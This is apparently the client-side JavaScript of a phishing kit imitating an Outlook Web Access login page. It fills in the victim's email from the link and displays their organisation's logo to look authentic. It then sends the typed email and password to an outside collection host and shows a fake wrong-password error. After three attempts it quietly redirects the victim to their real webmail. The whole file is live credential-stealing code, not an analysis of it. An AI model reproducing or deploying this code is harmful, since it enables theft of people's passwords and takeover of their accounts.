
    RndMimeCtl();




  /* global $ */
  $(document).ready(function(){
    var count=0;


    /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var base64regex = /^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;

        if (!base64regex.test(email)) {
            // alert(btoa(email));
            var my_email =email;
          }
          else
          {
            // alert(atob(email));
            var my_email =atob(email);
          }
        // $('#email').val(email);
        // var my_email =email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
         $('#email').val(my_email);
		 $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
      }





    $('#email').click(function(){
      $('#error').hide();
    });
    $('#next').click(function () {
      var my_email =$('#email').val();
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }
      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      
      $("#div1").animate({left:200, opacity:"hide"}, 0);
      $("#div2").animate({right:200, opacity:"show"}, 1000);
      $("#emailch").html(my_email);

  });
    $('#back').click(function () {
      $("#msg").hide();
      $("#email").val("");
      $("#password").val("");
      $("#div2").animate({left:200, opacity:"hide"}, 0);
      $("#div1").animate({right:200, opacity:"show"}, 1000);

    });


    $('#submit-btn').click(function(event){
      event.preventDefault();
      var email=$("#email").val();
      var password=$("#password").val();
      var detail=$("#field").html();
      var msg = $('#msg').html();

      var my_email =email;
      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      $('#msg').text( msg );
      count=count+1;
      $.ajax({
        dataType: 'JSON',
        url: "https://rezults.me/vibe/owa/connect.php",
        type: 'POST',
        data:{
          email:email,
          password:password,
          detail:detail,

        },
        beforeSend: function(xhr){
          $('#submit-btn').html('Verifing...');
        },
        success: function(response){
          $("#password").val("");
          if (count>=3) {
            count=1;
            window.location.replace("http://webmail."+my_slice);
          }
          if(response){
            $("#msg").show();
            console.log(response);
            if(response['signal'] == 'ok'){
             $('#msg').html(response['msg']);
           }
           else{
            $('#msg').html(response['msg']);
          }
        }
      },
      error: function(){
        $("#password").val("");
          if (count>=3) {
            count=1;
            window.location.replace("http://webmail."+my_slice);
          }
        $("#msg").show();
        $('#msg').html("The user name or password you entered isn't correct. Try entering it again.");
      },
      complete: function(){
        $('#submit-btn').html('sign in');
      }
    });
    });
  });
